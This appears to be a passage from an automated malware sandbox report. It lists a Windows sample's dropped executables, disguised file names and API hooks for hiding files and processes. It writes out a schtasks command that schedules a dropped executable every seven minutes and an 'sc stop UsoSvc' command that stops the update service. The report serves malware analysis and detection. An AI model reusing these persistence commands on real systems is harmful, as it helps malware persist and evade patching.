Source: KZcLqgnLvRf.exe0.8.dr	Static PE information: section name: .text entropy: 7.557452107884656
Source: KZcLqgnLvRf.exe1.8.dr	Static PE information: section name: .text entropy: 7.557452107884656

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\XVmuemSr.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\phOzxInG.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\LugVktua.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	File created: C:\PerfDll\hyperProviderSavesinto.exe	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\IkSFhrpY.log	Jump to dropped file
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	File created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Recovery\WmiPrvSE.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\kEwbgeKe.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Recovery\RuntimeBroker.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\vsaRQqFM.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	File created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\KEMGRwnV.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\zQhPhksn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	File created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\msAjSsFc.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\WiKMUFpI.log	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe			Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\msAjSsFc.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\WiKMUFpI.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\LugVktua.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\vsaRQqFM.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\kEwbgeKe.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\IkSFhrpY.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\KEMGRwnV.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\zQhPhksn.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\phOzxInG.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\XVmuemSr.log	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\PerfDll\hyperProviderSavesinto.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
